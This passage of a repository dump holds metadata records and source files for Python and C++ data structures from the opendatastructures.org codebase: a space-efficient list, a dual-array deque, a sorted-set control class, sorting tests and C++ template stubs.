"avg_line_length": 19.399999618530273,
"blob_id": "0a98731a67b780386cce39287d4574af1252af51",
"content_id": "2a0a9ef1d7eabe6f5274adf73dda59b8e28b2d4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/opendatastructures.org/python/ods/tests/test_selist.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom listtest import exercise_list\r\n\r\ndef test_sel():\r\n exercise_list(ods.SEList(5))\r\n exercise_list(ods.SEList(10))\r\n exercise_list(ods.SEList(42))\r\n \r\n"
},
{
"alpha_fraction": 0.7028985619544983,
"alphanum_fraction": 0.7028985619544983,
"avg_line_length": 17.428571701049805,
"blob_id": "1ba8dd4ae95c86197a673d67864f47a385fc981c",
"content_id": "8ab03d2293519c04055ea573dddd12ce20371154",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 138,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_skiplistsset.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_treap():\r\n exercise_sset(ods.SkiplistSSet())\r\n"
},
{
"alpha_fraction": 0.39790576696395874,
"alphanum_fraction": 0.46073299646377563,
"avg_line_length": 36.20000076293945,
"blob_id": "7a1e0264de6ef15512245df21eb1f5b88f3d072a",
"content_id": "0928e32b16672f24a0ab04a8184f5243fb51cf96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 15,
"path": "/opendatastructures.org/python/ods/geomvector.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"Demonstration code used to illustrate hashing a variable length object\"\"\"\r\nclass GeomVector(object):\r\n def hash_code(self):\r\n p = (1<<32)-5 # this is a prime number\r\n z = 0x64b6055a # 32 bits from random.org\r\n z2 = 0x5067d19d # random odd 32 bit number\r\n s = 0\r\n zi = 1\r\n for i in range(len(x)):\r\n # reduce to 31 bits\r\n xi = ((x[i].hash_code() * z2)%(1<<32)) >> 1 \r\n s = (s + zi * xi) % p\r\n zi = (zi * z) % p \r\n s = (s + zi * (p-1)) % p\r\n return s%(1<<32)\r\n"
},
{
"alpha_fraction": 0.5693780183792114,
"alphanum_fraction": 0.6076555252075195,
"avg_line_length": 11.933333396911621,
"blob_id": "5b5b6a56a0e346f690be49b7cefa92ee4cf4811b",
"content_id": "a1dff15fdbbd0018ffc4cc6314374156eb945389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 15,
"path": "/opendatastructures.org/cpp/ChainedHashTable.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * ChainedHashTable.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"ChainedHashTable.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\ntemplate class ChainedHashTable<int>;\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.663551390171051,
"alphanum_fraction": 0.6869158744812012,
"avg_line_length": 30.923076629638672,
"blob_id": "b3c93fd721c6bfddfe31417df954fb464765c455",
"content_id": "eea7a470dce35400e49758adf06c9672b315a068",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 428,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 13,
"path": "/opendatastructures.org/python/ods/tests/test_algorithms.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nfrom sorttest import exercise_sort\r\nfrom ods import merge_sort, quick_sort, counting_sort, radix_sort, heap_sort\r\n\r\ndef test_sorts():\r\n exercise_sort(merge_sort)\r\n exercise_sort(quick_sort)\r\n exercise_sort(heap_sort)\r\n k = 100\r\n exercise_sort(lambda a: counting_sort(a, k), lambda : random.randrange(k))\r\n r = 1000000\r\n exercise_sort(lambda a: radix_sort(a), lambda : random.randrange(r))\r\n"
},
{
"alpha_fraction": 0.6835442781448364,
"alphanum_fraction": 0.6835442781448364,
"avg_line_length": 14.88888931274414,
"blob_id": "a3149a6130b0dc0c238ae601331ba307defbaac9",
"content_id": "13c4d3ccb48a7aca195c283058a88277139d9957",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 9,
"path": "/opendatastructures.org/python/ods/tests/test_dualrraydeque.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom listtest import exercise_list\r\n\r\ndef test_as():\r\n exercise_list(ods.DualArrayDeque())\r\n \r\n"
},
{
"alpha_fraction": 0.42860469222068787,
"alphanum_fraction": 0.4346610903739929,
"avg_line_length": 26.403972625732422,
"blob_id": "c208f3939abcda610cade017708ed0aa2bddde09",
"content_id": "fe1d4d4fe34eb7242a25b7d63ecce613948b2773",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4293,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 151,
"path": "/opendatastructures.org/python/ods/selist.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nfrom utils import new_array\r\nfrom base import BaseList\r\nfrom arraydeque import ArrayDeque\r\n\r\nclass SEList(BaseList):\r\n class BDeque(ArrayDeque):\r\n \"\"\"A bounded-size deque\"\"\"\r\n def __init__(self, b):\r\n super(SEList.BDeque, self).__init__()\r\n self.a = new_array(b+1)\r\n \r\n def _resize(self):\r\n pass\r\n \r\n class Node(object):\r\n def __init__(self, b):\r\n self.d = SEList.BDeque(b)\r\n self.prev = None\r\n self.next = None\r\n \r\n def __init__(self, b):\r\n super(SEList, self).__init__()\r\n self.b = b\r\n self._initialize()\r\n \r\n def _new_node(self):\r\n return SEList.Node(self.b)\r\n \r\n def _initialize(self):\r\n self.dummy = self._new_node()\r\n self.dummy.next = self.dummy.prev = self.dummy\r\n self.n = 0\r\n \r\n def _add_before(self, w):\r\n \"\"\"Create a new node and add it before w\"\"\"\r\n u = self._new_node()\r\n u.prev = w.prev\r\n u.next = w\r\n u.next.prev = u\r\n u.prev.next = u\r\n return u\r\n \r\n def _remove_node(self, w):\r\n w.prev.next = w.next\r\n w.next.prev = w.prev\r\n \r\n def _get_location(self, i):\r\n if i < self.n//2:\r\n u = self.dummy.next\r\n while i >= u.d.size():\r\n i -= u.d.size()\r\n u = u.next\r\n return u,i\r\n else:\r\n u = self.dummy\r\n idx = self.n\r\n while i < idx:\r\n u = u.prev\r\n idx -= u.d.size()\r\n return u, i-idx\r\n \r\n def get(self, i):\r\n u, j = self._get_location(i)\r\n return u.d.get(j)\r\n\r\n def set(self, i, x):\r\n u, j = self._get_location(i)\r\n return u.d.set(j, x)\r\n\r\n def _spread(self, u):\r\n w = u\r\n for j in range(self.b):\r\n w = w.next\r\n w = self._add_before(w)\r\n while w is not u:\r\n while w.d.size() < self.b:\r\n w.d.add_first(w.prev.d.remove_last())\r\n w = w.prev\r\n \r\n def _gather(self, u):\r\n w = u\r\n for j in range(self.b-1):\r\n while w.d.size() < self.b:\r\n w.d.add_last(w.next.d.remove_first())\r\n w = w.next\r\n self._remove_node(w)\r\n \r\n \r\n def add(self, i, x):\r\n if i < 0 or i > self.n: raise IndexError()\r\n if i == self.n:\r\n self.append(x)\r\n return\r\n u, j = self._get_location(i)\r\n r = 0\r\n w = u\r\n while r < self.b and w is not self.dummy and w.d.size() == self.b+1:\r\n w = w.next\r\n r += 1\r\n if r == self.b: # b blocks, each with b+1 elements\r\n self._spread(u)\r\n w = u\r\n if w == self.dummy: # ran off the end - add new node\r\n w = self._add_before(w)\r\n while w is not u: # work backwards, shifting elements as we go\r\n w.d.add_first(w.prev.d.remove_last())\r\n w = w.prev\r\n w.d.add(j, x)\r\n self.n += 1\r\n\r\n def append(self, x):\r\n last = self.dummy.prev\r\n if last is self.dummy or last.d.size() == self.b+1:\r\n last = self._add_before(self.dummy)\r\n last.d.append(x)\r\n self.n += 1\r\n \r\n def remove(self, i):\r\n if i < 0 or i > self.n-1: raise IndexError()\r\n u, j = self._get_location(i)\r\n y = u.d.get(j)\r\n w = u\r\n r = 0\r\n while r < self.b and w is not self.dummy and w.d.size() == self.b-1:\r\n w = w.next\r\n r += 1\r\n if r == self.b: # b blocks, each with b-1 elements\r\n self._gather(u)\r\n u.d.remove(j)\r\n while u.d.size() < self.b-1 and u.next is not self.dummy:\r\n u.d.add_last(u.next.d.remove_first())\r\n u = u.next\r\n if u.d.size() == 0: self._remove_node(u)\r\n self.n -= 1\r\n\r\n def clear(self):\r\n self._initialize()\r\n \r\n def __iter__(self):\r\n u = self.dummy.next\r\n while u is not self.dummy:\r\n for x in u.d:\r\n yield x\r\n u = u.next\r\n\r\nif __name__ == \"__main__\":\r\n ell = SEList(6)\r\n print ell\r\n ell.append(20)\r\n ell.append(21)\r\n print ell \r\n"
},
{
"alpha_fraction": 0.5595238208770752,
"alphanum_fraction": 0.5595238208770752,
"avg_line_length": 7.333333492279053,
"blob_id": "8984b0ee19118b6621bca48f78ae188b75fb54a5",
"content_id": "92cb2b99db83ab3dda01e1c27f20d9b361c24b31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 84,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 9,
"path": "/opendatastructures.org/cpp/utils.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "#include \"utils.h\"\r\n\r\nnamespace ods {\r\n\r\nint hashCode(int x) {\r\n\treturn x;\r\n}\r\n\r\n}\r\n"
},
{
"alpha_fraction": 0.4784810245037079,
"alphanum_fraction": 0.5139240622520447,
"avg_line_length": 32.09090805053711,
"blob_id": "ac412cbf39efc717f3d97419b2a6699dd45b7010",
"content_id": "19bd59dd16cfb4db842d18ff870c71b259ec22ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 11,
"path": "/opendatastructures.org/python/ods/tests/sorttest.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nimport random\r\n\r\ndef exercise_sort(sort, gen=random.random):\r\n \"\"\"Run some tests on the sorting function, sort\"\"\"\r\n for n in [0, 1, 100, 1000, 10000]: \r\n a = [gen() for _ in range(n)]\r\n b = a[:]\r\n # in-place sorts return None, other sorts return sorted array\r\n c = sort(b)\r\n if c is None: c = b\r\n assert(sorted(a) == list(c))\r\n \r\n "
},
{
"alpha_fraction": 0.6855345964431763,
"alphanum_fraction": 0.6855345964431763,
"avg_line_length": 15,
"blob_id": "61144fe01f7f5fc190c6651c1f165e0799fd1c07",
"content_id": "c68cfeb870888d364745b5e3274757c564821012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 159,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 9,
"path": "/opendatastructures.org/python/ods/tests/test_dualarraydeque.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom listtest import exercise_list\r\n\r\ndef test_dad():\r\n exercise_list(ods.DualArrayDeque())\r\n \r\n"
},
{
"alpha_fraction": 0.48701298236846924,
"alphanum_fraction": 0.5389610528945923,
"avg_line_length": 10.833333015441895,
"blob_id": "59d4e6435358b652c9ff3fb58395aa03997cb462",
"content_id": "59b3ecf65b6e2cd6bdb39017e9046f57d8225d03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/BinaryHeap.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BinaryHeap.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"BinaryHeap.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.6034912467002869,
"alphanum_fraction": 0.6234413981437683,
"avg_line_length": 18.049999237060547,
"blob_id": "48275761ef99b026bb4c4b8a7af941829ac5599d",
"content_id": "1fd063098a23307cd4e0a5bbd2f01f368cc89ac2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 20,
"path": "/opendatastructures.org/cpp/SLList.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * SLList.cpp\r\n *\r\n * Created on: 2011-11-25\r\n * Author: morin\r\n */\r\n\r\n#include \"SLList.h\"\r\n\r\nnamespace ods {\r\n\r\ntemplate SLList<int>::SLList();\r\ntemplate SLList<int>::~SLList();\r\ntemplate int SLList<int>::push(int x);\r\ntemplate bool SLList<int>::add(int x);\r\ntemplate int SLList<int>::remove();\r\ntemplate int SLList<int>::pop();\r\ntemplate int SLList<int>::size();\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5365853905677795,
"alphanum_fraction": 0.5756097435951233,
"avg_line_length": 11.666666984558105,
"blob_id": "d69f638d62939488367a68c51d66105f445e54cd",
"content_id": "558393f1f2483a33ef7a55b484e8fcc0f72d1bc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 15,
"path": "/opendatastructures.org/cpp/FastArrayStack.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * FastArrayStack.cpp\r\n *\r\n * Created on: 2011-11-23\r\n * Author: morin\r\n */\r\n#include <string.h>\r\n#include \"FastArrayStack.h\"\r\n#include \"utils.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.702479362487793,
"alphanum_fraction": 0.702479362487793,
"avg_line_length": 14.714285850524902,
"blob_id": "bda5158d09b031a2f9a13324ad61c6ca70cebb12",
"content_id": "746a547007e9dd19f7bfc57db8727f22122293ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 121,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_binaryheap.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nimport ods\r\nfrom heaptest import exercise_heap\r\n\r\ndef test_bh():\r\n\texercise_heap(ods.BinaryHeap())\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6943867206573486,
"alphanum_fraction": 0.7110186815261841,
"avg_line_length": 23.3157901763916,
"blob_id": "02ffd71b744a3e53d293d35691fe2be803b2b945",
"content_id": "da9a508c198aa970a1600a10e84923771ea66e5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 19,
"path": "/opendatastructures.org/cpp/RootishArrayStack.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * RootishArrayStack.cpp\r\n *\r\n * Created on: 2011-11-23\r\n * Author: morin\r\n */\r\n\r\n#include \"RootishArrayStack.h\"\r\n\r\nnamespace ods {\r\n\r\ntemplate RootishArrayStack<int>::RootishArrayStack();\r\ntemplate RootishArrayStack<int>::~RootishArrayStack();\r\ntemplate void RootishArrayStack<int>::add(int,int);\r\ntemplate int RootishArrayStack<int>::remove(int);\r\ntemplate void RootishArrayStack<int>::grow();\r\ntemplate void RootishArrayStack<int>::shrink();\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.7071428298950195,
"alphanum_fraction": 0.7071428298950195,
"avg_line_length": 20.66666603088379,
"blob_id": "00e14523bfeec3fcff26db8989c726d494c5bdb4",
"content_id": "bdcfc9ad85ea097c56670a4387dd582db77c0015",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 140,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_binarysearchtree.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\n\r\nfrom nose.tools import *\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_bst():\r\n exercise_sset(ods.BinarySearchTree())\r\n"
},
{
"alpha_fraction": 0.3954372704029083,
"alphanum_fraction": 0.43193915486335754,
"avg_line_length": 27.177778244018555,
"blob_id": "2f979118a6e3cf7ec847f5c214c7c18b7cee7496",
"content_id": "37a6206c0bbf955953c7a6b9eae1a1ed370badf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1315,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 45,
"path": "/opendatastructures.org/python/ods/tests/listtest.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"For testing the functionality of list implementations\"\"\"\r\nimport random\r\n\r\nfrom nose.tools import *\r\nfrom ods import ControlList\r\n\r\ndef list_cmp(l1, l2):\r\n assert(l1 == l2)\r\n assert(list(l1) == list(l2))\r\n assert(len(l1) == len(l2))\r\n for i in range(len(l1)):\r\n assert(l1.get(i) == l2.get(i))\r\n\r\ndef exercise_list(ell=None):\r\n l1 = [ell, ControlList()][ell is None]\r\n l2 = ControlList()\r\n random.seed(5)\r\n n = 100\r\n for i in range(5):\r\n if i == 2: \r\n l1.clear()\r\n l2.clear()\r\n for _ in range(n):\r\n x = random.random();\r\n i = random.randrange(0, len(l1)+1)\r\n l1.add(i, x)\r\n l2.add(i, x)\r\n list_cmp(l1, l2)\r\n for _ in range(5*n):\r\n op = random.randrange(0,3)\r\n if (op == 0):\r\n i = random.randrange(0, len(l1)+1)\r\n x = random.random();\r\n l1.add(i, x)\r\n l2.add(i, x)\r\n elif op == 1:\r\n i = random.randrange(0, len(l1))\r\n x = random.random();\r\n l1.set(i,x)\r\n l2.set(i,x)\r\n else:\r\n i = random.randrange(0, len(l1))\r\n l1.remove(i)\r\n l2.remove(i)\r\n list_cmp(l1, l2)\r\n\r\n"
},
{
"alpha_fraction": 0.4738292098045349,
"alphanum_fraction": 0.4738292098045349,
"avg_line_length": 22.86046600341797,
"blob_id": "0fdc8bb3018329464bc81262bb5c0fc8756f3456",
"content_id": "78e3463c57ff6e2511667bb39f10ba31875e425b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1089,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 43,
"path": "/opendatastructures.org/python/ods/controlsset.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"A class that implements a stupid SSet (for testing purposes)\"\"\"\r\n\r\nimport bisect\r\n\r\nfrom base import BaseSet\r\n\r\nclass ControlSSet(BaseSet):\r\n def __init__(self, iterable=[]):\r\n self.a = []\r\n self.add_all(iterable)\r\n \r\n def add_all(self, iterable):\r\n for x in iterable:\r\n self.add(x)\r\n \r\n def add(self, x):\r\n i = bisect.bisect_left(self.a, x)\r\n if i == len(self.a) or self.a[i] != x:\r\n bisect.insort_right(self.a, x)\r\n return True\r\n return False\r\n \r\n def remove(self, x):\r\n i = bisect.bisect_left(self.a, x)\r\n if i != len(self.a) and self.a[i] == x:\r\n del self.a[i]\r\n return True\r\n return False\r\n \r\n def find(self, x):\r\n i = bisect.bisect_left(self.a, x)\r\n if i != len(self.a): \r\n return self.a[i]\r\n return None\r\n \r\n def size(self):\r\n return len(self.a)\r\n \r\n def clear(self):\r\n self.a = list()\r\n \r\n def __iter__(self):\r\n return self.a.__iter__()\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.4513888955116272,
"alphanum_fraction": 0.5069444179534912,
"avg_line_length": 10,
"blob_id": "bb8afa482e226ccdb9d1da1aa314bb155befa66a",
"content_id": "c4a8a065a943deeef5e9048a60238585fcab0938",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/array.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * array.cpp\r\n *\r\n * Created on: 2011-11-24\r\n * Author: morin\r\n */\r\n\r\n#include \"array.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5536912679672241,
"alphanum_fraction": 0.5872483253479004,
"avg_line_length": 12.190476417541504,
"blob_id": "176e267924c47ef2baaaa3d9da5646b6320df9a9",
"content_id": "e9cd4e2689048be73cfe422657e15ddf75e8c970",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 298,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 21,
"path": "/opendatastructures.org/cpp/AdjacencyLists.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * AdjacencyLists.cpp\r\n *\r\n * Created on: 2012-01-13\r\n * Author: morin\r\n */\r\n\r\n#include \"AdjacencyLists.h\"\r\n\r\nnamespace ods {\r\n\r\nAdjacencyLists::AdjacencyLists(int n0) {\r\n\tn = n0;\r\n\tadj = new List[n];\r\n}\r\n\r\nAdjacencyLists::~AdjacencyLists() {\r\n\tdelete[] adj;\r\n}\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.4513888955116272,
"alphanum_fraction": 0.5069444179534912,
"avg_line_length": 10,
"blob_id": "cf7bb7afec5ad9691eed52a1ce62ece9dfc87802",
"content_id": "f56a034851808d0742d2615ecacafc5abf47a958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/BTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BTree.cpp\r\n *\r\n * Created on: 2013-07-03\r\n * Author: morin\r\n */\r\n\r\n#include \"BTree.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5262145400047302,
"alphanum_fraction": 0.5300625562667847,
"avg_line_length": 27.98550796508789,
"blob_id": "e280f3300a59bf0ab8ae2c5442577e88cef51c17",
"content_id": "3fa23aed688ef4bc060602b7253138b6a33763d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2079,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 69,
"path": "/opendatastructures.org/python/ods/dualarraydeque.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "'''\r\nAn array-based list implementation with O(1+min{i,n-i}) amortized update time.\r\n\r\nThis running time is achieved by gluing together two ArrayStacks,\r\ncalled front and back, so that they are back to back.\r\n\r\nItems are redistributed even between front and back whenever one is more than\r\nthree times the size of the other.\r\n'''\r\n\r\nfrom arraystack import ArrayStack\r\n\r\nfrom base import BaseList\r\n\r\nclass DualArrayDeque(BaseList):\r\n def __init__(self, iterable=[]):\r\n self._initialize()\r\n self.add_all(iterable)\r\n \r\n def _initialize(self):\r\n self.front = ArrayStack()\r\n self.back = ArrayStack()\r\n \r\n def get(self, i):\r\n if i < self.front.size():\r\n return self.front.get(self.front.size()-i-1)\r\n else:\r\n return self.back.get(i-self.front.size())\r\n \r\n def set(self, i, x):\r\n if i < self.front.size():\r\n return self.front.set(self.front.size()-i-1, x)\r\n else:\r\n return self.back.set(i-self.front.size(), x)\r\n \r\n def add(self, i, x):\r\n if i < self.front.size():\r\n self.front.add(self.front.size()-i, x)\r\n else:\r\n self.back.add(i-self.front.size(), x)\r\n self._balance()\r\n\r\n def remove(self, i):\r\n if i < self.front.size():\r\n x = self.front.remove(self.front.size()-i-1)\r\n else:\r\n x = self.back.remove(i-self.front.size())\r\n self._balance()\r\n return x\r\n\r\n def _balance(self):\r\n n = self.size()\r\n mid = n//2\r\n if 3*self.front.size() < self.back.size() or 3*self.back.size() < self.front.size():\r\n f = ArrayStack()\r\n for i in range(mid):\r\n f.add(i, self.get(mid-i-1))\r\n b = ArrayStack()\r\n for i in range(n-mid):\r\n b.add(i, self.get(mid+i)) \r\n self.front = f\r\n self.back = b\r\n\r\n def clear(self):\r\n self.front.clear()\r\n self.back.clear()\r\n\r\n def size(self):\r\n return self.front.size() + self.back.size()\r\n \r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5797101259231567,
"alphanum_fraction": 0.5884057879447937,
"avg_line_length": 16.48214340209961,
"blob_id": "7fce07c345b7fb118a4824b1c2160f31bce917fa",
"content_id": "d71a18fce41dc4d37d395f86ea3b01fb29138026",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1035,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 56,
"path": "/opendatastructures.org/cpp/BlockStore.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BlockStore.h\r\n *\r\n * Created on: 2013-07-03\r\n * Author: morin\r\n */\r\n\r\n#ifndef BLOCKSTORE_H_\r\n#define BLOCKSTORE_H_\r\n\r\n#include \"ArrayStack.h\"\r\n\r\nnamespace ods {\r\n\r\n/**\r\n * This class fakes an external memory block storage system. It's just a list\r\n * of blocks.\r\n */\r\ntemplate<class T>\r\nclass BlockStore {\r\nprotected:\r\n\tArrayStack<T> blocks; // list of blocks\r\n\tArrayStack<unsigned> free; // unused block indices\r\npublic:\r\n\tBlockStore() : blocks(), free() {\t}\r\n\tvirtual void clear() {\r\n\t\tblocks.clear();\r\n\t\tfree.clear();\r\n\t}\r\n\tvirtual ~BlockStore() {\r\n\t\tclear();\r\n\t}\r\n\tvirtual int placeBlock(T block) {\r\n\t\tint i;\r\n\t\tif (free.size() > 0) {\r\n\t\t\ti = free.remove(free.size());\r\n\t\t} else {\r\n\t\t\ti = blocks.size();\r\n\t\t\tblocks.add(i, block);\r\n\t\t}\r\n\t\treturn i;\r\n\t}\r\n\tvirtual void freeBlock(int i) {\r\n\t\tblocks.set(i, NULL);\r\n\t\tfree.add(i);\r\n\t}\r\n\tvirtual T readBlock(int i) {\r\n\t\treturn blocks.get(i);\r\n\t}\r\n\tvoid writeBlock(int i, T block) {\r\n\t\tblocks.set(i, block);\r\n\t}\r\n};\r\n\r\n} /* namespace ods */\r\n#endif /* BLOCKSTORE_H_ */\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.550632894039154,
"avg_line_length": 11.166666984558105,
"blob_id": "a91234543b929e7938298f6870838823eb16a818",
"content_id": "a01f32fe1d6e5396e73b59d8eef975d4d965affd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/RedBlackTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * RedBlackTree.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"RedBlackTree.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.6231405138969421,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 17.387096405029297,
"blob_id": "64617708df7b32155a7aa0b9c1134a9f7bd2009b",
"content_id": "7bb28238f59542ffe1cf697ed9e25980893ab0a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 605,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 31,
"path": "/opendatastructures.org/cpp/ArrayStack.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * ArrayStack.cpp\r\n *\r\n * Created on: 2011-11-23\r\n * Author: morin\r\n */\r\n\r\n#include \"ArrayStack.h\"\r\n#include \"utils.h\"\r\n\r\n\r\nnamespace ods {\r\n\r\n\r\ntemplate ArrayStack<int>::ArrayStack();\r\ntemplate ArrayStack<int>::~ArrayStack();\r\ntemplate void ArrayStack<int>::add(int,int);\r\ntemplate int ArrayStack<int>::remove(int);\r\n\r\ntemplate ArrayStack<int*>::ArrayStack();\r\ntemplate ArrayStack<int*>::~ArrayStack();\r\ntemplate void ArrayStack<int*>::add(int,int*);\r\ntemplate int* ArrayStack<int*>::remove(int);\r\n\r\n\r\n//void pfft() {\r\n//\tArrayStack<int> asi;\r\n//\tasi.size();\r\n//}\r\n\r\n} /* namespace ods */\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6850000023841858,
"alphanum_fraction": 0.7110000252723694,
"avg_line_length": 23.64102554321289,
"blob_id": "d76ea88fbb228a05fe634306e9cb312efd04e889",
